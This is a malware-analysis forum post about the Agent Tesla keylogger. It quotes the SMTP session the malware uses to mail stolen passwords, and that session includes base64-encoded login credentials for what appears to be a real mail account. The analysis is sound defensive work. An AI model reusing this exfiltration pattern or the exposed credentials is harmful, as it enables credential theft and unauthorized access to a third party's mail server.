Attachments
(836.03 KiB) Downloaded 47 times
A forum for reverse engineering, OS internals and malware analysis
ikolor wrote:next ..This is Agent Tesla keylogger. A sample of the email header sent containing exfiltred data:
https://www.virustotal.com/en/file/dbbc ... 492425361/
EHLO [redacted]BR,
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable